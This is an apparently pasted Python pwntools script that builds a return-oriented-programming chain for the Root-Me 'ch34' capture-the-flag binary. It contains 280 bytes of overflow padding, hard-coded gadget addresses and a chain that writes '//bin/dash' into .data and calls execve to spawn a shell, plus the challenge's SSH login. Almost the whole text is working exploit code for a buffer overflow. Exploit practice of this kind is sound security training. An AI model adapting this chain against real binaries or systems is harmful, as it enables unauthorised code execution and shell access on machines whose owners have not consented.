
Untitled

a guest Oct 21st, 2019 117 Never
#!/usr/bin/env python2
# execve ROP chain for ./ch34; gadget addresses generated by ROPgadget.
#
# Reading guide: the chain stores a 16-byte program path plus an 8-byte zero
# terminator in .data, loads rdi/rsi/rdx with the execve arguments, counts
# rax up to 59 and ends on a `syscall ; ret` gadget.
# NOTE: this listing only assembles `p`; nothing here writes it to `proc`.
from pwn import *
from struct import pack

# 1 = start the local copy of the binary, 0 = start it on the challenge host
# over SSH.
DEBUG = 1
if not DEBUG:
    s = ssh(host='challenge03.root-me.org',
            user='app-systeme-ch34',
            password='app-systeme-ch34',
            port=2223)
    proc = s.process('./ch34')
else:
    proc = process('./ch34')

# Addresses as reported by ROPgadget. They are absolute, so the chain only
# lines up when the binary is mapped exactly here (presumably a non-PIE
# build -- confirm against the target; a randomised load address would
# invalidate every entry below).
POP_RDI = 0x00000000004016d3           # pop rdi ; ret
POP_RSI = 0x00000000004017e7           # pop rsi ; ret
POP_RDX = 0x0000000000437205           # pop rdx ; ret
POP_RAX = 0x000000000044d2b4           # pop rax ; ret
XOR_RAX = 0x000000000041bd9f           # xor rax, rax ; ret
INC_RAX = 0x000000000045aa10           # add rax, 1 ; ret
STORE_RAX_AT_RSI = 0x0000000000467b51  # mov qword ptr [rsi], rax ; ret
SYSCALL = 0x000000000045b525           # syscall ; ret
DATA = 0x00000000006c0000              # @ .data

# Number of `add rax, 1` steps after rax is zeroed; the header comment names
# the resulting syscall as execve.
RAX_STEPS = 59


def _q(value):
    """Pack *value* as one little-endian unsigned 64-bit word."""
    return pack('<Q', value)


# Padding goes here: 280 filler bytes ahead of the first gadget address
# (presumably the distance from the overflowed buffer to the saved return
# address -- confirm against the binary).
p = 'A' * 280

# .data + 0  <- '////////'
p += _q(POP_RSI) + _q(DATA)
p += _q(POP_RAX) + '////////'
p += _q(STORE_RAX_AT_RSI)

# .data + 8  <- 'bin/dash'
p += _q(POP_RSI) + _q(DATA + 8)
p += _q(POP_RAX) + 'bin/dash'
p += _q(STORE_RAX_AT_RSI)

# .data + 16 <- 0, which terminates the string written above
p += _q(POP_RSI) + _q(DATA + 16)
p += _q(XOR_RAX)
p += _q(STORE_RAX_AT_RSI)

# rdi = @ .data (start of the string), rsi = 0, rdx = 0
p += _q(POP_RDI) + _q(DATA)
p += _q(POP_RSI) + p64(0)
p += _q(POP_RDX) + p64(0)

# rax = 0, then one `add rax, 1` gadget per step, then the syscall gadget
p += _q(XOR_RAX)
p += _q(INC_RAX) * RAX_STEPS
p += _q(SYSCALL)